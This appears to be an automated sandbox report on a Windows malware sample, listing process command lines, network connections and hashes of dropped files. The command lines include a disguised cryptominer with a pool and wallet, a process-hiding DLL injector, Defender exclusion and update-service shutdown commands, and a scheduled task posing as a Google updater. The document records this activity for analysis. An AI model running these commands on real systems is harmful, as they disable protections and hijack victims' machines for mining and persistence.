sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o stratum+ssl://rx.unmineable.com:443 -u XMR:479zMaydapGMnV67s9w67R7MygH86ebCQiYFDtnpdfSwGyYbWnhGerbJCbk2i2WwZx9qCrpYQmzFTBsSsQddJRLpKhMj2AL.RIG_CPU -p Max1957 --algo rx/0 --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 126.21.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 194.49.94.11:80 tcp
MD 176.123.9.142:37637 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 185.174.136.219:443 tcp
RU 5.42.92.51:19057 tcp
IE 52.111.236.23:443 tcp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RU 5.42.64.16:443 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 95.214.26.28:80 host-host-file8.com tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
BG 91.92.247.247:39001 tcp
DE 144.76.136.153:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

MD5 63cd7e0102b49d21e24a2a73726376a9
SHA1 5eee503f895b015c40c8e0526ed769fb43fabe34
SHA256 9be0f395ebadabf1dfdd8aed19ea1fb73d828006bf646ce29a372e14327d2606
SHA512 cf465310be769424d496b4a48e63c3f6cfb72f1b1cc4db3aee0e6d43237c4134f6d8420d802b5759b55cc2a6ef6fb020a1183d741646d4cce7b09ce21a5b58d3

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

MD5 f207bc0205b365ccb8c7c89d91a230b6
SHA1 1a2cb9ca422aa610f860d96092ca0c2585acdddd
SHA256 b350d0c394bed6a2bc70e3d1d6b2da9a41b1c4d38f7166cfa7c90fcbb69e81e0
SHA512 71d5da002262bae3b5152e46f106f75f5819243a2ba9bdd34d2ba9f14e6b39cdaefd282e73b4d332ea58d3dbb1efea27728f191354d75c83376864b0f188c1b8

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

MD5 784667bb96ccb30c4cf44f2c5f493769
SHA1 28185165ab4dbbb4a139ae1af0bb6934ebe05c04
SHA256 1025fb084bca865df30e69eea7a9a4a3c852626e148b340de661e6f5b63bc1c9
SHA512 62c9def097f132cdb26b11e586f3e15407b9eb9e9e32f79460a3be1bd4c8e046db8488f754cd1c1cc4fe4025a3f9bc9484e94eae0c7d273050f8e6548d12bc20

memory/3436-21-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-22-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-23-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3436-25-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

memory/4800-29-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3184-30-0x0000000001FE0000-0x0000000001FF6000-memory.dmp

memory/4800-31-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

MD5 14d9834611ad581afcfea061652ff6cb
SHA1 802f964d0be7858eb2f1e7c6fcda03501fd1b71c
SHA256 e6e9b3d830f2d7860a09d596576e8ab0131c527b47dda73fe727b71b44c8cf60
SHA512 cbef1f44eb76d719c60d857a567a3fc700d62751111337cd4f8d30deae6901dc361320f28dac5ec5468420419eed66cada20f4c90fe07db6a3f8cf959eba31b5

memory/1800-37-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

MD5 a509f4a2e229e42815fc905328e28c3b
SHA1 4d509e467a27fb3164beeefe80a52d9c0b0793c2
SHA256 051cf969899b38e6942ca21fe35b8c59ec6da72583317a5ad34794dcc85da7ca
SHA512 bd3f769fef03d124cd28aaf1a3d176d3708da7578bca8d62438a92582c8bd355668c963b945cbf393417eca6dce633de4185aef66b21e6b31d74e93c3177fbd2

memory/1800-43-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/1800-45-0x0000000007C20000-0x00000000081C4000-memory.dmp

memory/1800-47-0x0000000007710000-0x00000000077A2000-memory.dmp

memory/1800-48-0x00000000078C0000-0x00000000078D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is64.bat

MD5 225edee1d46e0a80610db26b275d72fb
SHA1 ce206abf11aaf19278b72f5021cc64b1b427b7e8
SHA256 e1befb57d724c9dc760cf42d7e0609212b22faeb2dc0c3ffe2fbd7134ff69559
SHA512 4f01a2a248a1322cb690b7395b818d2780e46f4884e59f1ab96125d642b6358eea97c7fad6023ef17209b218daa9c88d15ea2b92f124ecb8434c0c7b4a710504

C:\Users\Admin\AppData\Local\Temp\is64.txt

MD5 a5ea0ad9260b1550a14cc58d2c39b03d
SHA1 f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256 f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA512 7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

memory/1800-54-0x00000000076F0000-0x00000000076FA000-memory.dmp

memory/1800-55-0x00000000087F0000-0x0000000008E08000-memory.dmp

memory/1800-57-0x0000000007960000-0x0000000007972000-memory.dmp

memory/1800-56-0x0000000007AB0000-0x0000000007BBA000-memory.dmp

memory/1800-58-0x00000000079C0000-0x00000000079FC000-memory.dmp

memory/1800-59-0x0000000007A00000-0x0000000007A4C000-memory.dmp

memory/3184-60-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-62-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-69-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-70-0x0000000002750000-0x0000000002760000-memory.dmp

memory/3184-68-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-71-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-67-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-66-0x0000000002730000-0x0000000002740000-memory.dmp

memory/1800-74-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/3184-73-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-76-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-72-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-78-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-80-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-79-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-82-0x0000000002750000-0x0000000002760000-memory.dmp

memory/3184-81-0x0000000002730000-0x0000000002740000-memory.dmp

memory/1800-77-0x00000000078C0000-0x00000000078D0000-memory.dmp

memory/3184-83-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-85-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-65-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-89-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-88-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-87-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-86-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-64-0x0000000002730000-0x0000000002740000-memory.dmp

memory/3184-63-0x0000000002720000-0x0000000002730000-memory.dmp

memory/3184-90-0x0000000002720000-0x0000000002730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4C94.exe

MD5 f6079a0d6e9c3d6c80af8adb5033b007
SHA1 c111e23c945fc86bf81729112ba1c0acdab479a0
SHA256 fed9fe7c0027acbfeb05ae652b70d981ed3aabb54559eb6bfb1ba24a27e1c3a7
SHA512 02f4609bad9babbd141e2e80e923a99b6e03969fbbf53ad1f99f1839da83076c41dd8765df081587bba466437ff64f292c672616addcae524e1e4909bc7c44bf

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

MD5 0592c6d7674c77b053080c5b6e79fdcb
SHA1 693339ede19093e2b4593fda93be0b140be69141
SHA256 fe19cdb149ecd8fd116f048852dcc10e46a3521351102685ce25c61a7d962a14
SHA512 37f2ff110b0702229b888280c8c2dff7885e6b1e583ccc47c36e74f44adfa491f70d6d6ab95d79149437d6fd9400448f1046eee3676ea98dffe99bc28e4783cb

memory/4780-99-0x0000000000540000-0x000000000059A000-memory.dmp

memory/3512-100-0x00000000004D0000-0x00000000004EE000-memory.dmp

memory/4780-105-0x0000000000400000-0x000000000046F000-memory.dmp

memory/3512-103-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4780-106-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4780-107-0x0000000007640000-0x0000000007650000-memory.dmp

memory/3512-108-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4780-109-0x0000000008100000-0x0000000008166000-memory.dmp

memory/4780-110-0x0000000008A00000-0x0000000008A76000-memory.dmp

memory/4780-111-0x0000000008AE0000-0x0000000008AFE000-memory.dmp

memory/4780-112-0x0000000008B90000-0x0000000008D52000-memory.dmp

memory/4780-113-0x0000000008D70000-0x000000000929C000-memory.dmp

memory/4780-114-0x0000000004510000-0x0000000004560000-memory.dmp

memory/4780-117-0x0000000073D70000-0x0000000074520000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6697.exe

MD5 8ee1f5e881840808946acf09bbc51f0f
SHA1 d127aaf7740adc4d0b6d37ced23b010f5be52cf2
SHA256 9de93be1d9882aaf80126934531965104436a42a11b96f12cb7d0a49f219d94f
SHA512 a2f18d6e848e73aa8cc3d8120bfb28704082dd9da9de16f4107282edd4c31c85cec649631dc6533be336576ed04f270760200f303a4641ba28a1ed1391e4f032

C:\Users\Admin\AppData\Local\Temp\6697.exe

MD5 502139b2b8daa082ff8d9dfabcf5706c
SHA1 06589361c3df8f840582c1774fe44ca70b6458e1
SHA256 bd89e4e9c035ab9c2aaef40f336383057162dd9444f43f106553cb573f540496
SHA512 54982c64437d8a9b677aa6e78d08a4cba82b3cc7e1959dc5c100249c4fc71748b691c9c7a3497eb7b27a06a1c15bede4101156da335b6f85daf00035a400cfb5

memory/2360-122-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/2360-123-0x0000000000820000-0x00000000014BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

memory/4752-155-0x00000229B41C0000-0x00000229B42AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

MD5 d497d6f5d3b74379d1ca2e1abde20281
SHA1 937aac5cf9191e833724edda2742ed115a5237c7
SHA256 a1765648a41eea21fd942776cba9b50705673d8f7564ae7f8c9751eda9e2e564
SHA512 bdb28622542e3b34e40b37a189a967b6136963200fec616c6147fd36bb543b94a7d64128d5fbd65a5358b1131dc265c7cbdb1240fece3e8c09652b97c4c025a6

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 00e93456aa5bcf9f60f84b0c0760a212
SHA1 6096890893116e75bd46fea0b8c3921ceb33f57d
SHA256 ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512 abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4752-171-0x00000229B5EA0000-0x00000229B5EB0000-memory.dmp

memory/4752-168-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp

memory/2360-173-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/2776-172-0x0000000002900000-0x0000000002901000-memory.dmp

memory/3512-177-0x0000000073D70000-0x0000000074520000-memory.dmp

memory/4752-178-0x00000229CE7A0000-0x00000229CE880000-memory.dmp

memory/4752-180-0x00000229CE880000-0x00000229CE960000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

memory/1484-187-0x0000000000400000-0x0000000000409000-memory.dmp

memory/468-191-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4752-192-0x00000229CEB30000-0x00000229CEBF8000-memory.dmp

memory/2776-193-0x0000000000400000-0x0000000000965000-memory.dmp

memory/3732-189-0x000002A1DC410000-0x000002A1DC510000-memory.dmp

memory/2400-194-0x00007FF70ADF0000-0x00007FF70B391000-memory.dmp

memory/1484-196-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3512-197-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4752-195-0x00000229B5F70000-0x00000229B5FBC000-memory.dmp

memory/4752-188-0x00000229CE960000-0x00000229CEA28000-memory.dmp

memory/468-186-0x0000000002BC0000-0x0000000002FBB000-memory.dmp

memory/1184-184-0x0000000000850000-0x0000000000859000-memory.dmp

memory/468-198-0x0000000002FC0000-0x00000000038AB000-memory.dmp

memory/3732-185-0x000002A1C1F00000-0x000002A1C1FA2000-memory.dmp

memory/1184-181-0x00000000008D0000-0x00000000009D0000-memory.dmp

memory/3732-200-0x000002A1DC530000-0x000002A1DC540000-memory.dmp

memory/3732-199-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp

memory/3556-203-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6ABE.exe.log

MD5 9f5d0107d96d176b1ffcd5c7e7a42dc9
SHA1 de83788e2f18629555c42a3e6fada12f70457141
SHA256 d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097
SHA512 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

memory/3556-211-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-212-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-214-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-218-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-220-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-226-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-230-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-238-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-240-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-236-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-234-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-232-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-228-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-224-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-222-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-216-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12axlfji.xpk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1f97138cbf4adb76aa8e557c25ced070
SHA1 6abc938a044f15d11a5c3f2c2ea1c3d15ed460d5
SHA256 57e27086d196f5ab95faab4bd72fd608eb13b4f70ab7fa1e15cf846d67b3f64d
SHA512 8e7f0228ae05d86b9ed65279a4904e04eedd5c4ad030373b05f84990ceb1b942e208ef94fecea100f685d1e9690fceda2a4e96075059bdb2cd240f348908ebb9

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 81e219617f0f5835723d7920b8387504
SHA1 790ca8b4b2c2412d569497270e2c5a7fc2196536
SHA256 a937f01ca7c5e481c72593fa847c302939665933173f53428ab43491c4f62a7d
SHA512 02b2ba7656d9ad5b2b850ba6fb04be2a10a10f5e275ab592514f185d084744c1b5597dbdf0c8745e0ffc3bbde5768c2ff3aa05417b2a7aecff9b7c0ed36bdb36

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Windows\rss\csrss.exe

MD5 15ccfec965d35354a2142fac5324dcb3
SHA1 4147dc51f89f068e1dd86746e00cb6e6f2a3fc4f
SHA256 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b
SHA512 3513db0d2f52873a5a23b29735e95e505ad0fea292771b5dc8df03dc100d1b5ecbb619842df7179b4c7452cb1cdd00691e23f9f8f98d436f587cd237d34f9500

C:\Windows\rss\csrss.exe

MD5 5ede9444cd75f9459b2e9b342459f505
SHA1 ff1ba9423b3eb54a92acf4b70ec5e8d4f7d26627
SHA256 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2
SHA512 f28278aaf5f762dd276e52f8d20651a3298892a268cfbe5459828dfa2b37ec3762061475e36738d1646e35ed6570d596742a454f4cf0c46b9eaef280286f88f4

C:\Users\Admin\AppData\Local\Temp\29EA.exe

MD5 5a45609af5960a9c4dbc014c4b5d244c
SHA1 b7bf85e0744b6cadb9ab9455b30ea834f39faf7f
SHA256 203fc9ad7667f1dcff5617a0659a69ca00b50cee6e16d3d6d5b954d77da9f804
SHA512 8096d82113efb5ca683c54581203c323af02748583e790310e63f702e9f0f2f20fbcc601d45201a4651432a644657998e7969ea4ceea618b6be6f1dfd52a74de

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 32a27baad5f258034ce06ac6af2f50d9
SHA1 f66f4139e0a93f52124d574c7b2ac4bdb86003c8
SHA256 06b33d357ebfaa95a0bf8ceb20fedc532429e41890eb0f9aa7ff657f1d352eb2
SHA512 25c75feae11baf22deb122469a72ce06ee08e38ee12325ff5021829092fad935694f9a6e3029ac4570b95440f9b967586d21630ec1e08736aa347eba0be5d334

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7cb0337b756d69a7be3033dd6e382832
SHA1 baa60488b56bf731f0b819cb6ec776cc26af2369
SHA256 19ded27b35a890678e81e21c70cc763137f03d4febca3292b68fc1f044b8750e
SHA512 dc0876bba041e50161038b6de01fae930ebeef81807192a850113b5a2272a06cf9104214c27fbdd3028874e55a2c162b1da5018b80fb518944084d7763d78ce3

C:\Program Files\Google\Chrome\updater.exe

MD5 95da659749eface0e13cfb3d0e14066a
SHA1 bd603217113e715b5b2db6728ad7e82d2def6691
SHA256 41918960565fee217f130bfe086619658754b4d891612287c0b855bd34cdb4c1
SHA512 2b0e3f07b0c74775e9dd10b2f82dd22f7e6800f8c6d333b9551272a7858394c5c17ef0139b235f76bab75199ece2103e583ac9f63cc7bcf95188c3d69076228a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6bfa1a8bfcd8eb3af582a86a9ab3c742
SHA1 398fcd6058976d0d2ce35837de57eaf41f8cd852
SHA256 8487b79837e76c55c238e74aed5fa5149c1a968843909cc761c3065461b4ff0b
SHA512 ce17087ffab56c3465e79d0625847accab9d4fda12a7ae3755c205f3e3aff4fe53a6625954dccb550d4b31bebfc47865d40a5b58269b7730d5b2839a6e9435c7

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e05eafdd49496642c93745c94d61c128
SHA1 7108db5d99ae116a283c7203ce3c55f3e222b620
SHA256 53eb2bc0ed32d4184e202ae5602b31b2dfc3207bc0b2bee56f38bce02dbd8dc5
SHA512 b34f56b5a82e8dd6d08fdbad72ca8aee168a7d3a78ebba69f5446b8e58bf6407a29b44389d11ab6ab69a30259894a520f8db8f643220799ad18e4e4c3f3d4494

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

MD5 36dfcd31a45ce2c580f008b20e6cd2ad
SHA1 a245d87d7ef799d9aded126e39d5372fb430139e
SHA256 3bcc0a133a93c3e05b01f496eb9c27b8c74104d5857dfb93aa8a08e6989520ac
SHA512 72971986db21b0023971361c825de2599c2ae4c5d8e837226a11f4363cdb9da671a5078c09dd72d62f4b8ecc1071051918b37d297a6d7a991f539d102236942d

